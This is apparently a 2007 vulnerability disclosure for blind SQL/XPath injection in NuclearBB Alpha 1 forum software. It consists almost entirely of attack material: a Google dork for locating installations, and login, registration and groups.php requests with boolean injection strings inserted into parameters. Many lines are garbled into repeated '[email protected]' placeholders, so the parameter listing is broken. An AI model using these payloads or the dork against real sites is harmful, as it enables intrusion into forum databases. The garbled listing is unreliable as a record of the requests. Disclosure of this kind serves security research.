NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"
username=xyz
password=passxyz
submit=Login"+and+"1"="0
[email protected]
[email protected]
pass1=passwordxyz
pass2=passwordxyz
[email protected]"+and+"1"="0
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
coppa_state=over
register_submit=Register
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]"+and+"1"="0
[email protected]
[email protected]
coppa_state=over
register_submit=Register
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]"+and+"1"="0
coppa_state=over
register_submit=Register
http://www.example.com/groups.php?g=1+and+1=0
[email protected]
[email protected]+and+1=0
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
coppa_state=over®ister_submit=Register
John Martinelli
[email protected]
http://john-martinelli.com
April 18th, 2007